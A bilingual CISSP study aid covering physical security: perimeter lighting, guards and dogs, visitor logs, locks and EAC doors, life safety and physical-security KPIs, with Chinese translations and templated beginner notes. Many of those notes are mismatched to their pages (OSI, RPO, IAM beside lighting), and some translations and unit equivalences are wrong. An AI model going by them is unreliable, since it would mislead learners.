Lighting Lighting is the most commonly used form of perimeter security control, providing the security benefit of deterrence. The primary purpose of lighting is to discourage casual intruders, trespassers, prowlers, or would-be thieves who would rather perform their misdeeds, such as vandalism, theft, and loitering, in the dark. Both interior and exterior lighting should be implemented for security, especially related to parking areas, walkways, and entrances. Exterior lighting should generally be on from dusk until dawn. Interior lighting may be always on, switched manually, or triggered on demand, possibly via motion.

Emergency lighting should be implemented in key areas (such as exits and escape routes) and triggered with the loss of power or along with a fire alarm. Lighting is often claimed to be the most commonly deployed physical security mechanism. However, lighting is only a deterrent and not a strong deterrent. It should not be used as the primary or sole protection mechanism except in areas with a low threat level. Your entire site, inside and out, should be well lit. This provides for easy identification of personnel and makes it easier to notice intrusions. Lighting should not necessarily be used to illuminate the positions of guards, dogs, patrol posts, or other similar security elements.

However, these can be

中文直译 / 整理

陷阱可用于控制进入设施,或控制进入设施内更高安全级别的区域,例如数 据中心或 SCIF。 物理安全的另一个关键要素,尤其适用于数据中心、政府设施和高度安全的组 织,是安全路障,用于防止车辆撞击出入口。 这些路障可以永久固定,也可以 在预定时间或收到警报时从安装基座自动升起。 它们常被伪装成花坛或其他建 筑元素。 参见“设施设计”部分中关于CPTED的先前讨论。 路障除了围栏外,还用于控制行人和车辆通行。 K型护栏(常在道路施工期间 可见)、大型花坛、之字形排队通道、路障和轮胎破碎机都是路障的例子。 正 确使用时,它们可以控制人群,防止车辆被用于破坏您的建筑。 应避免设置长 而笔直、无遮挡的车辆通道,以防止车速过快。 如果设有发电机和燃料储存设 施,可能需要增加额外的路障防护层,以防止篡改或破坏。 照明 照明是最常用的周界安全控制形式,具有威慑的安全效益。 照明的主要目的是 阻止随意的入侵者、非法侵入者、游荡者或企图行窃者,这些人更愿意在黑暗 中实施其不法行为,例如破坏、盗窃和闲逛。 为了安全,应同时实施室内和室 外照明,尤其涉及停车区、人行道和出入口。 室外照明通常应在黄昏至黎明期 间保持开启。

室内照明可以始终开启、手动开关,或通过运动感应等方式按需 触发。 关键区域(如出口和逃生路线)应设置应急照明,并在断电或火灾报警 时自动启动。 照明常被认为是部署最广泛的物理安全机制。 然而,照明仅具有 威慑作用,并非强有力的威慑手段,除在低威胁区域外,不应作为主要或唯一 的防护措施。 您的整个场地,包括室内外,都应充分照明。 这有助于轻松识别 人员,并更容易发现入侵行为。 照明不一定要用于照亮警卫、狗、巡逻点或其他类似安全元素的位置。 然而,这些 元素可以

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 700 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 46 / PDF P701

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

illuminated if knowledge of their presence is to be used as a deterrent. Lighting should be combined with security guards, guard dogs, security cameras, or some other form of intrusion detection or surveillance mechanism. Lighting must not cause a nuisance or problem for nearby residents, roads, railways, airports, and so on. It should also never cause glare or reflective distraction to guards, dogs, and monitoring equipment, which could otherwise aid attackers during break-in attempts. Strong lights used to illuminate a building located on a fence line pointing inward can function as a means to hide intruders.

Just think of standing in the dark with someone pointing a flashlight at you—you will be unable to see the other person because the light pointing toward you overpowers your vision. It is generally accepted as a de facto standard that lighting used for perimeter protection should illuminate critical areas with at least 2 foot-candles of power (which is approximately 2 lumens, or 20 lux). Another common issue for the use of lighting is the placement of the lights. Standards seem to indicate that light poles should be placed the same distance apart as the diameter of the illuminated area created by illumination elements.

Thus, if a lighted area is 40 feet in diameter, poles should be 40 feet apart (although it seems to us that placing the poles about 10–20 percent closer is a better option to ensure overlapping of the illuminated areas). This light pole positioning allows for the intersection of lighted areas on the ground, thus preventing an intruder from gaining access under the cover of darkness. Security Guards and Guard Dogs All physical security controls, whether static deterrents or active detection and surveillance mechanisms, ultimately rely on personnel to intervene and prevent actual intrusions and attacks. Security guards exist to fulfill this need.

Guards can be posted around a perimeter or inside to monitor access points or watch detection and surveillance monitors. The real benefit of guards is that they are able to adapt and react to various conditions or situations. Guards can learn and recognize attack and intrusion activities and patterns, can adjust to a changing environment, and can make decisions and judgment calls. Security guards are often an appropriate security control when immediate situation handling and decision-making on-site is necessary.

Guards should perform patrols both internally and externally to look for security violations, unauthorized entities, or other abnormalities throughout the facility and campus grounds. Patrols should be frequent, but at random

中文直译 / 整理

在需要利用其存在作为威慑时予以照明。 照明应与警卫、警犬、安防摄像头或 其他某种入侵检测或监控机制相结合。 照明不得对附近的居民、道路、铁路、 机场等造成干扰或问题。 同时,绝对不应造成对警卫、狗和监控设备的眩光或 反射干扰,否则可能在入侵尝试中帮助攻击者。 用于照亮位于围栏线上、朝内 照射的建筑物的强光,可能成为隐藏入侵者的手段。 请想象一下,你站在黑暗 中,有人用手电筒照着你——由于朝你照射的光线 overpower 了你的视觉,你 将无法看到对方。 通常认为,用于周界防护的照明应以至少2英尺烛光(约等于2流明,或20勒克 斯)的照度照亮关键区域。 照明使用的另一个常见问题是灯具的布置。 标准似 乎表明,灯杆应按照照明元件所形成照明区域的直径间隔设置。 因此,如果照 明区域的直径为40英尺,灯杆应间隔40英尺放置(尽管我们认为,将灯杆间距 缩短约10–20%是更好的选择,以确保照明区域重叠)。 这种灯杆布置方式可 在地面上形成照明区域的交叉,从而防止入侵者在黑暗中潜入。 安保人员与警犬 所有物理安全控制措施,无论是静态威慑还是主动检测与监控机制,最终都依 赖人员介入以防止实际的入侵和攻击。

安保人员的存在正是为了满足这一需求。 安保人员可部署在周界周围或内部,以监控出入口或监视检测与监控屏幕。 安 保人员真正的优势在于他们能够适应并应对各种条件或情况。 安保人员可以学 习并识别攻击和入侵活动及模式,能够适应不断变化的环境,并能做出决策和 判断。 当需要立即处理现场情况并作出决策时,安保人员通常是合适的安全控 制措施。 . 安保人员应定期在设施内部和外部进行巡逻,以发现安全违规行为、未经授权 的人员或其他异常情况。 巡逻应频繁进行,但时间应随机安排

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

标准:标准给出必须满足的最低要求。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Minimum level、mandatory requirement 常对应 standard。

网络题先定位层次,再判断协议、设备或攻击位置。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
标准 标准给出必须满足的最低要求。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 47 / PDF P702

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

intervals. This prevents an intruder from observing a pattern of patrols and then timing their break-in accordingly. Unfortunately, using security guards is not a perfect solution. There are numerous disadvantages to deploying, maintaining, and relying on security guards. Not all environments and facilities support security guards. This may be because of actual human incompatibility or the facility's layout, design, location, and construction. Not all security guards are reliable. Prescreening, bonding, and training do not guarantee that you won't end up with an ineffective or unreliable security guard.

Even if a guard is initially reliable, guards are subject to physical injury and illness, take vacations, can become distracted, are vulnerable to social engineering, and may become unemployable because of substance abuse. In addition, security guards usually offer protection only up to the point at which their life is endangered. Additionally, security guards are usually unaware of the scope of the operations within a facility and are, therefore, not thoroughly equipped to know how to respond to every situation.

Though this is considered a disadvantage, the lack of knowledge of the scope of the operations within a facility can also be considered an advantage, because this supports the confidentiality of those operations and thus helps reduce the possibility that a security guard will be involved in the disclosure of confidential information. Finally, security guards are expensive, whether they are employees or are provided by a third-party contractor. Guard dogs can be an alternative to security guards. They can often be deployed as a perimeter security control. As a detection and deterrent, dogs are extremely effective.

However, dogs are costly, require a high level of maintenance (i.e., housing, feeding, health care, training, etc.), and impose serious insurance and liability requirements. Robot sentries can be used to patrol an area automatically to look for anything out of place. Robot sentries often use facial recognition to identify authorized individuals and potentially identify intruders. Robot sentries can be on wheels or a flying drone (aka uncrewed aerial vehicle [UAV]). Internal Security Controls A mechanism to handle visitors is required if a facility is designed with restricted areas to control physical security.

Often, an escort is assigned to visitors, and their access and activities are monitored closely. Failing to track the actions of outsiders when they are allowed into a protected area can result

中文直译 / 整理

间隔。 这可防止入侵者观察到巡逻模式并据此安排入侵时间。 不幸的是,使用保安人员并非完美解决方案。 部署、维护和依赖保安人员存在 诸多缺点。 并非所有环境和设施都适合配备保安人员。 这可能是由于实际的人 体不兼容性,或设施的布局、设计、位置和结构所致。 并非所有保安人员都可 靠。 预先筛选、担保和培训并不能保证您不会雇佣到无效或不可靠的保安人员。 即使保安人员最初可靠,他们仍可能遭受身体伤害或疾病,需要休假,容易分 心,易受社会工程学攻击,并可能因滥用物质而失去就业资格。 此外,保安人 员通常仅在自身生命受到威胁时才提供保护。 另外,保安人员通常不了解设施 内运营的范围,因此无法充分应对各种情况。 尽管这被视为一种劣势,但对设 施内运营范围缺乏了解也可能被视为一种优势,因为这有助于保障这些运营的 机密性,从而降低保安人员参与泄露机密信息的可能性。 最后,无论保安人员 是雇员还是由第三方承包商提供,费用都十分高昂。 护卫犬可以作为保安人员的替代方案。 它们通常可作为外围安全控制措施部 署。 作为检测和威慑手段,犬类极为有效。

然而,犬类成本高昂,需要高水 平的维护(即住宿、喂养、医疗保健、训练等),并带来严重的保险和责任 要求。 机器人哨兵可用于自动巡逻区域,以发现任何异常情况。 机器人哨兵通常使 用人脸识别来识别授权人员并可能识别入侵者。 机器人哨兵可以是轮式或飞 行无人机(即无人飞行器 [UAV])。 内部安全控制 如果设施设计了受限区域以控制物理安全,则需要一种机制来管理访客。 通常, 会为访客指派陪同人员,并对其访问权限和活动进行密切监控。 允许外部人员 进入受保护区域时,若未能追踪其行为,可能导致

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

授权:授权是认证之后决定你能访问什么、能做什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

认证成功不等于什么都能做;权限仍要单独授权。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
授权 授权是认证之后决定你能访问什么、能做什么。
学习单元 48 / PDF P703

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

in malicious activity against the most protected assets. Visitor control can also benefit from the use of keys, combination locks, badges, motion detectors, intrusion alarms, and more. Reception can be used as a choke point to block access to unauthorized visitors. The reception area should be segregated from the security areas with locked doors and monitored by security cameras. If a visitor is authorized, then an escort can be assigned to accompany them around the facility. If a valid worker arrives, the receptionist may be able to “buzz” the door open for them. Any unauthorized visitors can be asked to leave, security guards can be brought to bear, or police can be called.

Visitor logs are a manual or automated list of nonemployee entries or access to a facility or location. Employee logs may also be useful for access tracking and verification. Logs of physical access should be maintained. These can be created automatically through the use of smartcards or manually by a security guard. The physical access logs establish context for the interpretation of logical logs. Logs are helpful in an emergency to determine whether everyone has escaped a building safely. Keys and Combination Locks Locks keep closed doors closed. They are designed and deployed to prevent access to everyone without proper authorization.

A lock is a crude form of an identification and authorization mechanism. If you possess the correct key or combination, you are considered authorized and permitted entry. Key-based locks are the most common and inexpensive forms of physical access control devices. These are often known as preset, deadbolt, or conventional locks. These types of locks are subject to lock picking, which is often categorized under a class of lock mechanism attacks called shimming. Many conventional locks are also vulnerable to an attack known as bumping. Bumping is accomplished using a special bump key that when properly tapped or bumped causes the lock pins to jump and allows the cylinder to turn.

Programmable or combination locks offer a broader range of control than preset locks. Some programmable locks can be configured with multiple valid access combinations or may include digital or electronic controls employing keypads, smartcards, or cipher devices. For instance, an electronic access control (EAC) lock incorporates three elements: an electromagnet to keep the door closed, a credential reader to authenticate subjects and deactivate the electromagnet, and a sensor to reengage the electromagnet when the door is

中文直译 / 整理

对最敏感资产造成恶意破坏。 访客管理还可通过使用钥匙、组合锁、徽章、 运动探测器、入侵报警器等手段得到加强。 接待处可用作控制点,以阻止未经授权的访客进入。 接待区应与安保区域隔离, 配备上锁的门并由安保摄像头监控。 若访客获得授权,可指派一名陪同人员随 行其在设施内活动。 若合法员工到达,接待员可为他们“远程开门”。 任何未 经授权的访客均可被要求离开,可调派安保人员,或报警处理。 访客登记簿是记录非员工进入或访问设施或地点的手动或自动化清单。 员 工登记记录也可用于访问跟踪和验证。 应保存物理访问日志。 这些日志可通过 智能卡自动创建,或由安保人员手动记录。 物理访问日志为解释逻辑日志提供 了上下文。 在紧急情况下,日志有助于确定是否所有人员均已安全撤离建筑物。 钥匙与组合锁 锁具用于保持门的关闭状态,其设计和部署旨在防止未经授权的人员进入。 锁 是一种原始的身份识别与授权机制。 若您持有正确的钥匙或密码,则被视为已 获授权并被允许进入。 基于钥匙的锁具是最常见且最经济的物理访问控制设备。 这些锁通常被称为预设锁、死栓锁或传统锁。 此类锁具易受开锁撬锁攻击,此 类攻击常归类为一种名为拨片攻击的锁具机制攻击。

许多传统锁具也易受一种 称为“撞击”的攻击。 撞击是通过使用特制的撞击钥匙实现的:当钥匙被正确 敲击或撞击时,锁芯内的弹子会跳起,从而使锁芯转动。 可编程锁或组合锁比预设锁提供更广泛的控制。 某些可编程锁可以配置多个有 效的访问组合,或可能包含采用键盘、智能卡或密码设备的数字或电子控制。 例如,电子访问控制(EAC)锁包含三个要素:一个电磁铁用于保持门关闭, 一个凭证读取器用于验证主体并停用电磁铁,以及一个传感器用于在门关闭时 重新激活电磁铁

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 49 / PDF P704

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

closed. An EAC can monitor the amount of time that a door stays open to trigger a warning buzzer if a door stays open for longer than 5 seconds and trigger an intrusion alarm if the door stays open for longer than 10 seconds (times are examples, not prescriptions). Locks serve as an alternative to security guards as a perimeter entrance access control device. A gate or door can be opened and closed to allow access by a security guard who verifies your identity before granting access, or the lock itself can serve as the verification device that also grants or restricts entry.

Environmental Issues and Life Safety An important aspect of physical access control and maintaining the security of a facility is protecting the basic elements of the environment and protecting human life. In all circumstances and under all conditions, the most important aspect of security is protecting people. Thus, preventing harm to people is the most important goal for all security solutions. Part of maintaining personnel safety is maintaining a facility's basic environment. People can survive for short periods without water, food, power, and air conditioning.

But in some cases, the loss of these elements can have disastrous results or be symptoms of more immediate and dangerous problems. Flooding, fires, release of toxic materials, natural disasters, and human-made disasters all threaten human life as well as the stability of a facility. Physical security procedures should focus on protecting human life, restoring the environment's safety, and restoring the utilities necessary for the IT infrastructure to function. People should always be your top priority. Only after personnel are safe can you consider addressing business continuity.

Many organizations adopt occupant emergency plans (OEPs) to guide and assist with sustaining personnel safety after a disaster. The OEP guides how to minimize threats to life, prevent injury, manage duress, handle travel, provide safety monitoring, and protect property from damage due to a destructive physical event. The OEP does not address IT issues or business continuity, just personnel and general property. The business continuity plan (BCP) and disaster recovery plan (DRP) address IT and business continuity and recovery issues. Regulatory Requirements

中文直译 / 整理

关闭。 EAC可以监控门保持开启的时间,如果门开启时间超过5秒,则触发 警告蜂鸣器; 如果门开启时间超过10秒,则触发入侵警报(时间仅为示例, 非强制规定)。 锁可以作为保安人员的替代方案,用作周界入口的访问控制设备。 门或闸门可 以打开或关闭,由保安人员在验证您的身份后允许通行,或者锁本身也可以作 为验证设备,直接授予或限制进入。 环境问题与生命安全 物理访问控制和维护设施安全的一个重要方面是保护环境的基本要素和保障人 类生命。 在所有情况下和各种条件下,安全的最重要方面都是保护人员。 因此, 防止对人员造成伤害是所有安全解决方案的首要目标。 维护人员安全的一部分是维护设施的基本环境。 人们在短期内可以没有水、食 物、电力和空调生存,但在某些情况下,这些要素的丧失可能导致灾难性后果, 或表明更紧迫且危险的问题。 洪水、火灾、有毒物质泄漏、自然灾害和人为灾 难都会威胁人类生命以及设施的稳定性。 物理安全程序应侧重于保护人类生命、 恢复环境安全,以及恢复IT基础设施运行所必需的公用设施。 人员应始终是您的首要任务。 只有在确保人员安全后,才能考虑业务连续性问 题。

许多组织采用人员应急计划(OEPs)来指导和协助在灾难发生后保障人 员安全。 OEP 指导如何最大限度地减少对生命的威胁、防止伤害、应对压力、 管理出行、提供安全监控以及保护财产免受破坏性物理事件的损害。 OEP 不 涉及 IT 问题或业务连续性,仅关注人员和一般财产。 业务连续性计划( BCP)和灾难恢复计划(DRP)则处理 IT 和业务连续性与恢复问题。 监管要求

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

程序:程序是一步一步怎么做。

身份:身份是主体在系统中的标识。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

BCP 保护业务流程,DRP 保护 IT 恢复。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 50 / PDF P705

第 705 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Every organization operates within a certain industry and jurisdiction. Both of these entities (and possibly additional ones) impose legal requirements, restrictions, and regulations on the practices of organizations that fall within their realm. These legal requirements can apply to the licensed use of software, hiring restrictions, handling of sensitive materials, and compliance with safety regulations. Complying with all applicable legal requirements is a key part of sustaining security. The legal requirements for an industry and a country (and often also a state and city) must be considered a baseline or foundation on which the remainder of the security infrastructure is built.

Key Performance Indicators of Physical Security Key performance indicators (KPIs) of physical security should be determined, monitored, recorded, and evaluated. KPIs are metrics or measurements of the operation or failure of various aspects of physical security. The goal of using KPIs is to assess the effectiveness of security efforts. Only with such information can management make informed decisions on altering existing security operations to achieve a higher level of effective security protection. Keep in mind that the overall goal of security is to reduce risk so that the organization's objectives can be achieved costeffectively.

Here are common and potential examples of physical security KPIs: Number of successful intrusions Number of successful crimes Number of successful incidents Number of successful disruptions Number of unsuccessful intrusions Number of unsuccessful crimes Number of unsuccessful incidents Number of unsuccessful disruptions Time to detect incidents Time to assess incidents Time to respond to incidents

中文直译 / 整理

每个组织都在特定的行业和司法管辖区中运营。 这两个实体(以及可能的其他 实体)对其管辖范围内的组织实践施加法律要求、限制和法规。 这些法律要求 可能涉及软件的许可使用、雇佣限制、敏感材料的处理以及遵守安全法规。 遵守所有适用的法律要求是维持安全的关键部分。 必须将行业和国家(通常还 包括州和城市)的法律要求视为基础或前提,在此基础上构建其余的安全基础 设施。 物理安全的关键绩效指标 关键绩效指标(KPIs)应被确定、监控、记录和评估。 KPI是衡量物理安全各 个方面运行或故障情况的指标或度量。 使用KPI的目标是评估安全工作的有效 性。 只有拥有此类信息,管理层才能做出明智的决策,调整现有的安全操作, 以实现更高水平的有效安全防护。 请记住,安全的总体目标是降低风险,以便 组织能够以成本有效的方式实现其目标。 以下是物理安全关键绩效指标的常见和潜在示例: 成功入侵次数 成功犯罪次数 成功事件次数 成功干扰次数 未成功入侵次数 未成功犯罪次数 未成功事件次数 未成功干扰次数 检测事件所需时间 是时候评估事件了 是时候响应事件了

小白解释

场景先行:你是公司的安全负责人,正在读第 705 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 705 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 51 / PDF P706

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Time to recover from incidents Time to restore normal conditions after an incident Level of organizational impact of incidents Number of false positives (i.e., false detection alerts/alarms) A baseline should be established for each KPI, and a record of each measurement should be maintained. This historical record and baseline are necessary to perform trend analysis and gain an understanding of the performance of the physical security mechanisms. Automatically collected KPIs are often preferred, since they will be recorded reliably. Manual KPI measurements are often more important, but they require attention and focus to collect.

Each incident response operation (even if a BCP and DRP level issue), should conclude with a lessons learned phase where/when any additional KPI-related information is gathered or determined and recorded. With reliable KPI assessment, organizations can identify deficiencies, assess improvements, evaluate response measures, and perform return on security investment (ROSI) and cost/benefit analysis for physical security controls. Summary In all circumstances and under all conditions, the most important goal of security is protecting people. Several elements are involved in implementing and maintaining physical security.

One core element is selecting or designing the facility to house your IT infrastructure and the operations of your organization. You must start with a plan that outlines the security needs for your organization and develops through a process known as critical path analysis. Additional elements of a secure facility plan are evaluating site selection and visibility requirements and considering facility design elements such as Crime Prevention Through Environmental Design (CPTED). The security controls implemented to manage physical security can be divided into three groups: administrative (management, managerial, or procedural), technical (logical), and physical.

Administrative physical security controls include facility construction and selection, site management, building design, personnel controls, awareness training, and emergency response and procedures. Technical physical security controls include building access controls; intrusion detection; alarms; security cameras;

中文直译 / 整理

从事件中恢复所需时间 事件后恢复常态所需时间 事件对组织的影响程度 误报数量(即误检测警报/报警) 应为每个关键绩效指标(KPI)建立基线,并记录每次测量结果。 此历史记录 和基线对于执行趋势分析并了解物理安全机制的性能是必要的。 通常更倾向于 自动收集的KPI,因为它们能可靠地被记录。 手动KPI测量通常更为重要,但 需要投入注意力和专注力进行收集。 每次事件响应操作(即使属于业务连续性 计划BCP和灾难恢复计划DRP级别的问题)都应以经验总结阶段结束,在此 阶段收集、确定并记录任何与KPI相关的额外信息。 通过可靠的KPI评估,组 织可以识别缺陷、评估改进效果、评估响应措施,并对物理安全控制进行安全 投资回报率(ROSI)和成本/效益分析。 摘要 在所有情况和条件下,安全的最重要目标是保护人员。 实施和维护物理安全涉及多个要素。 其中一个核心要素是选择或设计用于容纳 您的IT基础设施和组织运营的设施。 您必须从一个明确组织安全需求的计划开 始,并通过一种称为关键路径分析的过程加以完善。 安全设施计划的其他要素 包括评估选址和可见性要求,以及考虑诸如通过环境设计预防犯罪(CPTED) 等设施设计要素。

为管理物理安全而实施的安全控制可分为三类:管理性(管理、行政或程序性)、 技术性(逻辑性)和物理性。 管理性物理安全控制包括设施建设和选址、场地 管理、建筑设计、人员控制、意识培训以及应急响应和程序。 技术性物理安全 控制包括建筑访问控制、入侵检测、警报、安全摄像头;

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

